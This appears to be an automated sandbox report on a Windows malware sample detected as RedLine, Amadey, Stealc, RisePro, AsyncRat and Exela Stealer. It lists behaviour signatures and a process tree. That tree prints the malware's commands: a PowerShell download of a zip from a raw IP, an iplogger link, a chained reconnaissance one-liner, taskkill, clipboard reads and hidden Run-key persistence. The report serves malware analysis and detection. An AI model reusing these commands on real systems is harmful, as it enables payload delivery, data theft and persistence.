Analysis Overview
SHA256
c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
Threat Level: Known bad
The file c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f was found to be: Known bad.
Malicious Activity Summary
RedLine
PrivateLoader
Amadey
Stealc
Modifies firewall policy service
RisePro
Exela Stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
AsyncRat
RedLine payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Grants admin privileges
Async RAT payload
Modifies Windows Firewall
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Reads data files stored by FTP clients
Identifies Wine through registry keys
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Checks BIOS information in registry
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops Chrome extension
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Command and Scripting Interpreter: PowerShell
Unsigned PE
Runs net.exe
Enumerates system info in registry
Enumerates processes with tasklist
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Gathers system information
Checks processor information in registry
Views/modifies file attributes
Runs ping.exe
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Collects information from the system
Modifies data under HKEY_USERS
Gathers network information
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-31 22:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 22:27
Reported
2024-05-31 22:29
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Amadey
Exela Stealer
RisePro
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7ec52fcc46.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7ec52fcc46.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1000043001\\volumeinfo.exe'\"" | C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| N/A | N/A | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 708 set thread context of 824 | N/A | C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe | C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe | N/A |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\1000004002\cfe1e50b73.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
"C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000004002\cfe1e50b73.exe
"C:\Users\Admin\1000004002\cfe1e50b73.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe391346f8,0x7ffe39134708,0x7ffe39134718
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
